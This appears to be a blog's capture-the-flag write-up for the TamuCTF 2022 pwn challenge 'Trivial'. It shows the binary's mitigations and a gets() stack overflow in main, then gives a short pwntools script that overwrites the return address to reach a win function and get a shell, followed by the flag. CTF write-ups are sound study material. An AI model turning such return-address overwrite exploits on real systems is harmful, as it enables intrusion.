Aynakeya's Blog

Kill My Emotion

[Pwn] Trivial [Tamu CTF 2022]

0x0 Introduction

Author: nhwn

Feeling lucky? I have just the challenge for you :D

SNI: lucky

files: trivial, trival.c

0x1 Mitigation

1
2
3
4
5
Arch:     amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)

0x2 Vulnerability

Very trivial buffer overflow in main. Overwrite rip to function win to get a shell

1
2
3
4
5
void main() {
char buff[69];

gets(buff);
}

0x3 Exploit

1
2
3
4
5
6
7
8
9
10
11
from pwn import *

context.binary = ELF("trivial")

p = remote("tamuctf.com", 443, ssl=True, sni="trivial")
p.sendline(flat({
0x50+0x8:[
0x00401132
]
}))
p.interactive()

0x4 Flag

gigem{sorry_for_using_the_word_trivial}

0%